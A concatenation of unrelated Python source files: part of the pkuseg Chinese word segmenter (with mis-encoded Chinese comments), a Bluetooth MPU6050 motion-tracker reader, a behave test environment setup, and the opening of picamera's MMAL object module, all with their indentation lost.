ฅๅ่ฏ"""
l = len(word)
now = self.trie
for i in range(l):
c = word[i]
if not c in now.children:
now.children[c] = TrieNode(False)
now = now.children[c]
now.isword = True
def solve(self, txt):
"""ๅฏนๆๆฌ่ฟ่ก้ขๅค็"""
outlst = []
iswlst = []
l = len(txt)
last = 0
i = 0
while i < l:
now = self.trie
j = i
found = False
while True:
c = txt[j]
if not c in now.children:
break
now = now.children[c]
j += 1
if now.isword:
found = True
break
if j == l:
break
if found:
if last != i:
outlst.append(txt[last:i])
iswlst.append(False)
outlst.append(txt[i:j])
iswlst.append(True)
last = j
i = j
else:
i += 1
if last < l:
outlst.append(txt[last:l])
iswlst.append(False)
return outlst, iswlst
class Postprocesser:
"""ๅฏนๅ่ฏ็ปๆๅๅค็"""
def __init__(self, common_name, other_name):
if common_name is None and other_name is None:
self.do_process = False
return
self.do_process = True
if common_name is None:
self.common_words = set()
else:
with open(common_name, encoding='utf-8') as f:
lines = f.readlines()
self.common_words = set(map(lambda x:x.strip(), lines))
if other_name is None:
self.other_words = set()
else:
with open(other_name, encoding='utf-8') as f:
lines = f.readlines()
self.other_words = set(map(lambda x:x.strip(), lines))
def post_process(self, sent, check_seperated):
for m in reversed(range(2, 8)):
end = len(sent)-m
if end < 0:
continue
i = 0
while (i < end + 1):
merged_words = ''.join(sent[i:i+m])
if merged_words in self.common_words:
do_seg = True
elif merged_words in self.other_words:
if check_seperated:
seperated = all(((w in self.common_words)
or (w in self.other_words)) for w in sent[i:i+m])
else:
seperated = False
if seperated:
do_seg = False
else:
do_seg = True
else:
do_seg = False
if do_seg:
for k in range(m):
del sent[i]
sent.insert(i, merged_words)
i += 1
end = len(sent) - m
else:
i += 1
return sent
def __call__(self, sent):
if not self.do_process:
return sent
return self.post_process(sent, check_seperated=True)
class pkuseg:
def __init__(self, model_name="default", user_dict="default"):
"""ๅๅงๅๅฝๆฐ๏ผๅ ่ฝฝๆจกๅๅ็จๆท่ฏๅ
ธ"""
# print("loading model")
# config = Config()
# self.config = config
if model_name in ["default"]:
config.modelDir = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"models",
model_name,
)
else:
config.modelDir = model_name
# config.fModel = os.path.join(config.modelDir, "model.txt")
if user_dict == "default":
# file_name = os.path.join(
# os.path.dirname(os.path.realpath(__file__)),
# "dicts", "default_common.txt",
# )
file_name = None
other_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dicts", "default.txt",
)
else:
file_name = user_dict
other_name = None
# self.preprocesser = Preprocesser(file_name)
self.preprocesser = Preprocesser([])
self.postprocesser = Postprocesser(file_name, other_name)
self.feature_extractor = FeatureExtractor.load()
self.model = Model.load()
self.idx_to_tag = {
idx: tag for tag, idx in self.feature_extractor.tag_to_idx.items()
}
# self.idx2tag = [None] * len(self.testFeature.tagIndexMap)
# for i in self.testFeature.tagIndexMap:
# self.idx2tag[self.testFeature.tagIndexMap[i]] = i
# if config.nLabel == 2:
# B = B_single = "B"
# I_first = I = I_end = "I"
# elif config.nLabel == 3:
# B = B_single = "B"
# I_first = I = "I"
# I_end = "I_end"
# elif config.nLabel == 4:
# B = "B"
# B_single = "B_single"
# I_first = I = "I"
# I_end = "I_end"
# elif config.nLabel == 5:
# B = "B"
# B_single = "B_single"
# I_first = "I_first"
# I = "I"
# I_end = "I_end"
# self.B = B
# self.B_single = B_single
# self.I_first = I_first
# self.I = I
# self.I_end = I_end
self.n_feature = len(self.feature_extractor.feature_to_idx)
self.n_tag = len(self.feature_extractor.tag_to_idx)
# print("finish")
def _cut(self, text):
"""
็ดๆฅๅฏนๆๆฌๅ่ฏ
"""
examples = list(self.feature_extractor.normalize_text(text))
length = len(examples)
all_feature = [] # type: List[List[int]]
for idx in range(length):
node_feature_idx = self.feature_extractor.get_node_features_idx(
idx, examples
)
# node_feature = self.feature_extractor.get_node_features(
# idx, examples
# )
# node_feature_idx = []
# for feature in node_feature:
# feature_idx = self.feature_extractor.feature_to_idx.get(feature)
# if feature_idx is not None:
# node_feature_idx.append(feature_idx)
# if not node_feature_idx:
# node_feature_idx.append(0)
all_feature.append(node_feature_idx)
_, tags = _inf.decodeViterbi_fast(all_feature, self.model)
words = []
current_word = None
is_start = True
for tag, char in zip(tags, text):
if is_start:
current_word = char
is_start = False
elif "B" in self.idx_to_tag[tag]:
words.append(current_word)
current_word = char
else:
current_word += char
if current_word:
words.append(current_word)
return words
def cut(self, txt):
"""ๅ่ฏ๏ผ็ปๆ่ฟๅไธไธชlist"""
txt = txt.strip()
ret = []
if not txt:
return ret
imary = txt.split() # ๆ นๆฎ็ฉบๆ ผๅไธบๅคไธช็ๆฎต
# ๅฏนๆฏไธช็ๆฎตๅ่ฏ
for w0 in imary:
if not w0:
continue
# ๆ นๆฎ็จๆท่ฏๅ
ธๆๆๆดๅค็ๆฎต
lst, isword = self.preprocesser.solve(w0)
for w, isw in zip(lst, isword):
if isw:
ret.append(w)
continue
output = self._cut(w)
ret.extend(self.postprocesser(output))
return ret
def train(trainFile, testFile, savedir, nthread=10):
"""็จไบ่ฎญ็ปๆจกๅ"""
# config = Config()
starttime = time.time()
if not os.path.exists(trainFile):
raise Exception("trainfile does not exist.")
if not os.path.exists(testFile):
raise Exception("testfile does not exist.")
if not os.path.exists(config.tempFile):
os.makedirs(config.tempFile)
if not os.path.exists(config.tempFile + "/output"):
os.mkdir(config.tempFile + "/output")
# config.runMode = "train"
config.trainFile = trainFile
config.testFile = testFile
config.modelDir = savedir
# config.fModel = os.path.join(config.modelDir, "model.txt")
config.nThread = nthread
os.makedirs(config.modelDir, exist_ok=True)
trainer.train(config)
# pkuseg.main.run(config)
# clearDir(config.tempFile)
print("Total time: " + str(time.time() - starttime))
def _test_single_proc(
input_file, output_file, model_name="default", user_dict="default", verbose=False
):
times = []
times.append(time.time())
seg = pkuseg(model_name, user_dict)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
results = []
for line in lines:
results.append(" ".join(seg.cut(line)))
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(results))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = ["load_model", "read_file", "word_seg", "write_file"]
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def _proc_deprecated(seg, lines, start, end, q):
for i in range(start, end):
l = lines[i].strip()
ret = seg.cut(l)
q.put((i, " ".join(ret)))
def _proc(seg, in_queue, out_queue):
# TODO: load seg (json or pickle serialization) in sub_process
# to avoid pickle seg online when using start method other
# than fork
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
out_queue.put((idx, " ".join(seg.cut(line))))
def _proc_alt(model_name, user_dict, in_queue, out_queue):
seg = pkuseg(model_name, user_dict)
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
out_queue.put((idx, " ".join(seg.cut(line))))
def _test_multi_proc(
input_file,
output_file,
nthread,
model_name="default",
user_dict="default",
verbose=False,
):
alt = multiprocessing.get_start_method() == "spawn"
times = []
times.append(time.time())
if alt:
seg = None
else:
seg = pkuseg(model_name, user_dict)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
in_queue = Queue()
out_queue = Queue()
procs = []
for _ in range(nthread):
if alt:
p = Process(
target=_proc_alt,
args=(model_name, user_dict, in_queue, out_queue),
)
else:
p = Process(target=_proc, args=(seg, in_queue, out_queue))
procs.append(p)
for idx, line in enumerate(lines):
in_queue.put((idx, line))
for proc in procs:
in_queue.put(None)
proc.start()
times.append(time.time())
result = [None] * len(lines)
for _ in result:
idx, line = out_queue.get()
result[idx] = line
times.append(time.time())
for p in procs:
p.join()
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(result))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = [
"load_model",
"read_file",
"start_proc",
"word_seg",
"join_proc",
"write_file",
]
if alt:
times = times[1:]
time_strs = time_strs[1:]
time_strs[2] = "load_modal & word_seg"
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def test(
input_file,
output_file,
model_name="default",
user_dict="default",
nthread=10,
verbose=False,
):
if nthread > 1:
_test_multi_proc(
input_file, output_file, nthread, model_name, user_dict, verbose
)
else:
_test_single_proc(
input_file, output_file, model_name, user_dict, verbose
)
|
motiontracker.py
|
"""Bluetooth motion tracker module.
Copyright 2017 Mark Mitterdorfer
Class to read from a Bluetooth MPU6050 device.
Obtain acceleration, angular velocity, angle and temperature
"""
import threading
import struct
import bluetooth
class MotionTracker(object):
"""Class to track movement from MPU6050 Bluetooth device.
"""
def __init__(self, bd_addr, port=1):
"""Initialization for tracker object.
Args:
bd_addr (str) : Bluetooth address
port (int, optional) : Port, defaults to 1
Attributes:
bd_addr (str): Bluetooth address
port (int): Port
sock (bluetooth.bluez.BluetoothSocket) : Bluetooth socket object
acc_x (float) : acceleration in X
acc_y (float) : acceleration in Y
acc_z (float) : acceleration in Z
angv_x (float) : angular velocity in X
angv_y (float) : angular velocity in Y
angv_z (float) : angular velocity in Z
ang_x (float) : angle degrees in X
ang_y (float) : angle degrees in Y
ang_z (float) : angle degrees in Z
temperature (float) : temperature in degrees celsius
__thread_read_device_data (threading.Thread) : Read input thread
"""
self.bd_addr = bd_addr
self.port = port
self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.sock.connect((self.bd_addr, self.port))
self.acc_x = 0.0
self.acc_y = 0.0
self.acc_z = 0.0
self.angv_x = 0.0
self.angv_y = 0.0
self.angv_z = 0.0
self.ang_x = 0.0
self.ang_y = 0.0
self.ang_z = 0.0
self.temperature = 0.0
self.__thread_read_device_data = None
def start_read_data(self):
"""Start reading from device. Wait for a second or two before
reading class attributes to allow values to 'settle' in.
Non blocking I/O performed via a private read thread.
"""
self.__thread_read_device_data = threading.Thread(target=self.__read_device_data)
self.__thread_read_device_data.is_running = True
self.__thread_read_device_data.start()
def stop_read_data(self):
"""Stop reading from device. Join back to main thread and
close the socket.
"""
self.__thread_read_device_data.is_running = False
self.__thread_read_device_data.join()
self.sock.close()
def __read_device_data(self):
"""Private method to read device data in 9 byte blocks.
"""
while self.__thread_read_device_data.is_running:
data_block = self.sock.recv(1)
if data_block == b'\x55':
data_block_type = self.sock.recv(1)
# Acceleration
if data_block_type == b'\x51':
# Read 9 byte block
ax_l = self.sock.recv(1)
ax_h = self.sock.recv(1)
ay_l = self.sock.recv(1)
ay_h = self.sock.recv(1)
az_l = self.sock.recv(1)
az_h = self.sock.recv(1)
t_l = self.sock.recv(1)
t_h = self.sock.recv(1)
self.sock.recv(1) # Check sum, ignore
self.acc_x = struct.unpack("<h", ax_l + ax_h)[0] / 32768.0 * 16.0
self.acc_y = struct.unpack("<h", ay_l + ay_h)[0] / 32768.0 * 16.0
self.acc_z = struct.unpack("<h", az_l + az_h)[0] / 32768.0 * 16.0
self.temperature = struct.unpack("<h", t_l + t_h)[0] / 340.0 + 36.25
# Angular velocity
elif data_block_type == b'\x52':
# Read 9 byte block
wx_l = self.sock.recv(1)
wx_h = self.sock.recv(1)
wy_l = self.sock.recv(1)
wy_h = self.sock.recv(1)
wz_l = self.sock.recv(1)
wz_h = self.sock.recv(1)
t_l = self.sock.recv(1)
t_h = self.sock.recv(1)
self.sock.recv(1) # Check sum, ignore
self.angv_x = struct.unpack("<h", wx_l + wx_h)[0] / 32768.0 * 2000.0
self.angv_y = struct.unpack("<h", wy_l + wy_h)[0] / 32768.0 * 2000.0
self.angv_z = struct.unpack("<h", wz_l + wz_h)[0] / 32768.0 * 2000.0
self.temperature = struct.unpack("<h", t_l + t_h)[0] / 340.0 + 36.25
# Angle
elif data_block_type == b'\x53':
# Read 9 byte block
roll_l = self.sock.recv(1)
roll_h = self.sock.recv(1)
pitch_l = self.sock.recv(1)
pitch_h = self.sock.recv(1)
yaw_l = self.sock.recv(1)
yaw_h = self.sock.recv(1)
t_l = self.sock.recv(1)
t_h = self.sock.recv(1)
self.sock.recv(1) # Check sum, ignore
self.ang_x = struct.unpack("<h", roll_l + roll_h)[0] / 32768.0 * 180.0
self.ang_y = struct.unpack("<h", pitch_l + pitch_h)[0] / 32768.0 * 180.0
self.ang_z = struct.unpack("<h", yaw_l + yaw_h)[0] / 32768.0 * 180.0
self.temperature = struct.unpack("<h", t_l + t_h)[0] / 340.0 + 36.25
def main():
"""Test driver stub.
"""
try:
session = MotionTracker(bd_addr="20:16:09:21:48:81")
session.start_read_data()
while True:
print("ang_x:", session.ang_x, "ang_y:", session.ang_y, "ang_z:", session.ang_z)
except KeyboardInterrupt:
session.stop_read_data()
if __name__ == "__main__":
main()
|
environment.py
|
import sys
from threading import Thread
from ipdb import post_mortem
from app.app import app
from bdd_tests.modules.thread_bottle import MyServer
def begin(server):
app.run(server=server)
def before_all(context):
sys.dont_write_bytecode = True
context.base_url = 'http://127.0.0.1:8080'
context.server = MyServer(host="localhost", port=8080)
Thread(target=begin, args=(context.server,)).start()
def after_step(context, step):
if step.status == 'failed':
post_mortem(step.exc_traceback)
def after_all(context):
context.server.shutdown()
|
mmalobj.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
